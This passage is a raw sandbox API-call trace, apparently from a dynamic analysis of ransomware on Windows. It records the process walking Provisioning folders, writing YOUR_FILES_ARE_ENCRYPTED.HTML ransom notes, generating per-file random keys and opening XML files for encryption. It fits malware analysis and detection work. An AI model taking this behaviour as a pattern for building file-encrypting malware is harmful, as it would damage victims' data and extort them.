ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa0eac9f1, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x22f, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime.xml", cAlternateFileName="")) returned 0 [0106.670] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0106.670] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 115 [0106.670] GetProcessHeap () returned 0x600000 [0106.671] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0106.671] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0106.671] WriteFile (in: hFile=0x32c, lpBuffer=0x315b018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x315b018*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0106.672] CloseHandle (hObject=0x32c) returned 1 [0106.790] GetProcessHeap () returned 0x600000 [0106.790] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0106.790] GetProcessHeap () returned 0x600000 [0106.790] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0106.791] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd452a9e, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbd452a9e, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbd452a9e, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="Prov", cAlternateFileName="")) returned 0 [0106.791] FindClose (in: hFindFile=0x626738 | out: hFindFile=0x626738) returned 1 [0106.791] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 110 [0106.791] GetProcessHeap () returned 0x600000 [0106.791] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ed848 [0106.791] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0106.792] WriteFile (in: hFile=0x308, lpBuffer=0x6ed848*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ed848*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0106.793] CloseHandle (hObject=0x308) returned 1 [0106.793] GetProcessHeap () returned 0x600000 [0106.793] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ed848 | out: hHeap=0x600000) returned 1 [0106.793] GetProcessHeap () returned 0x600000 [0106.793] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0106.794] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc75be0a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbc75be0a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbc75be0a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="{1e05dd5d-a022-46c5-963c-b20de341170f}", cAlternateFileName="{1E05D~1")) returned 1 [0106.794] StrStrIW (lpFirst="{1e05dd5d-a022-46c5-963c-b20de341170f}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.794] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}") returned 80 [0106.795] GetProcessHeap () returned 0x600000 [0106.795] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0106.796] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}" [0106.796] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*" [0106.796] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc75be0a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbc75be0a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbc75be0a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0106.797] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc75be0a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbc75be0a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbc75be0a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="..", cAlternateFileName="")) returned 1 [0106.797] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa10504bd, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa10504bd, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa10504bd, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x4ef, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="customizations.xml", cAlternateFileName="CUSTOM~1.XML")) returned 1 [0106.798] StrStrIW (lpFirst="customizations.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.798] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml") returned 99 [0106.798] PathFindExtensionW (pszPath="customizations.xml") returned=".xml" [0106.798] lstrlenW (lpString=".xml") returned 4 [0106.798] PathFindExtensionW (pszPath="customizations.xml") returned=".xml" [0106.798] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0106.798] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0106.798] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=1263) returned 1 [0106.798] GetProcessHeap () returned 0x600000 [0106.798] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x6b47b0 [0106.800] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="97") returned 2 [0106.800] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="86") returned 2 [0106.800] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="86") returned 2 [0106.800] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="53") returned 2 [0106.800] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="C4") returned 2 [0106.800] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="BD") returned 2 [0106.800] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="6B") returned 2 [0106.800] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="54") returned 2 [0106.800] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="E1") returned 2 [0106.800] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="48") returned 2 [0106.800] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="F1") returned 2 [0106.800] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="97") returned 2 [0106.801] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="B5") returned 2 [0106.801] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="36") returned 2 [0106.801] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="BE") returned 2 [0106.801] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="E7") returned 2 [0106.801] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="F2") returned 2 [0106.801] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="41") returned 2 [0106.801] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="ED") returned 2 [0106.801] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="3A") returned 2 [0106.801] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="EB") returned 2 [0106.801] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="0D") returned 2 [0106.801] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="D6") returned 2 [0106.801] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="E6") returned 2 [0106.801] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="70") returned 2 [0106.801] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="6A") returned 2 [0106.801] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="99") returned 2 [0106.801] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="AF") returned 2 [0106.801] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="A0") returned 2 [0106.801] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="01") returned 2 [0106.801] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="10") returned 2 [0106.801] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="38") returned 2 [0106.802] lstrcpyW (in: lpString1=0x6c4864, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml" [0106.802] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x6b47b0, NumberOfConcurrentThreads=0x0) returned 0x274 [0106.802] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x6b47b0, lpOverlapped=0x6b47b0) returned 1 [0106.802] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa102a24e, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa102a24e, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa102a24e, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x10f, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="MasterDatastore.xml", cAlternateFileName="MASTER~1.XML")) returned 1 [0106.802] StrStrIW (lpFirst="MasterDatastore.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.802] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\MasterDatastore.xml") returned 100 [0106.802] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0106.802] lstrlenW (lpString=".xml") returned 4 [0106.802] PathFindExtensionW (pszPath="MasterDatastore.xml") returned=".xml" [0106.802] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0106.802] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\masterdatastore.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0106.802] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=271) returned 1 [0106.802] CloseHandle (hObject=0x32c) returned 1 [0106.802] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc75be0a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbc75be0a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbc75be0a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="Prov", cAlternateFileName="")) returned 1 [0106.802] StrStrIW (lpFirst="Prov", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.802] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov") returned 85 [0106.802] GetProcessHeap () returned 0x600000 [0106.802] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0106.803] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov" [0106.803] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\*" [0106.803] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc75be0a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbc75be0a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbc75be0a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0106.803] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc75be0a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbc75be0a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbc75be0a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="..", cAlternateFileName="")) returned 1 [0106.804] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc75be0a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbc75be0a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbc75be0a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime", cAlternateFileName="")) returned 1 [0106.804] StrStrIW (lpFirst="RunTime", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.804] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime") returned 93 [0106.804] GetProcessHeap () returned 0x600000 [0106.804] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0106.805] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime" [0106.805] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\*" [0106.805] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc75be0a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbc75be0a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbc75be0a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x600284, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0106.806] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc75be0a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbc75be0a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbc75be0a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x600284, cFileName="..", cAlternateFileName="")) returned 1 [0106.806] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0fddd6c, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa0fddd6c, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1003fe2, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x168, dwReserved0=0x63d090, dwReserved1=0x600284, cFileName="Power_0.provxml", cAlternateFileName="POWER_~1.PRO")) returned 1 [0106.806] StrStrIW (lpFirst="Power_0.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.806] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_0.provxml") returned 109 [0106.806] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0106.806] lstrlenW (lpString=".provxml") returned 8 [0106.806] PathFindExtensionW (pszPath="Power_0.provxml") returned=".provxml" [0106.806] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1003fe2, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1003fe2, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1003fe2, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x168, dwReserved0=0x63d090, dwReserved1=0x600284, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 1 [0106.806] StrStrIW (lpFirst="Power_1.provxml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.806] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\Power_1.provxml") returned 109 [0106.806] PathFindExtensionW (pszPath="Power_1.provxml") returned=".provxml" [0106.806] lstrlenW (lpString=".provxml") returned 8 [0106.806] PathFindExtensionW (pszPath="Power_1.provxml") returned=".provxml" [0106.806] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1003fe2, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1003fe2, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa1003fe2, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x168, dwReserved0=0x63d090, dwReserved1=0x600284, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 0 [0106.806] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0106.806] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0106.806] GetProcessHeap () returned 0x600000 [0106.806] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315c020 [0106.807] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\prov\\runtime\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0106.809] WriteFile (in: hFile=0x314, lpBuffer=0x315c020*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x315c020*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0106.810] CloseHandle (hObject=0x314) returned 1 [0106.810] GetProcessHeap () returned 0x600000 [0106.810] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315c020 | out: hHeap=0x600000) returned 1 [0106.810] GetProcessHeap () returned 0x600000 [0106.810] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0106.811] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1003fe2, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa1003fe2, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa102a24e, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x157, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime.xml", cAlternateFileName="")) returned 1 [0106.811] StrStrIW (lpFirst="RunTime.xml", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0106.811] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\Prov\\RunTime.xml") returned 97 [0106.811] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0106.811] lstrlenW (lpString=".xml") returned 4 [0106.811] PathFindExtensionW (pszPath="RunTime.xml") returned=".xml" [0106.811] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0106.811] CreateFileW 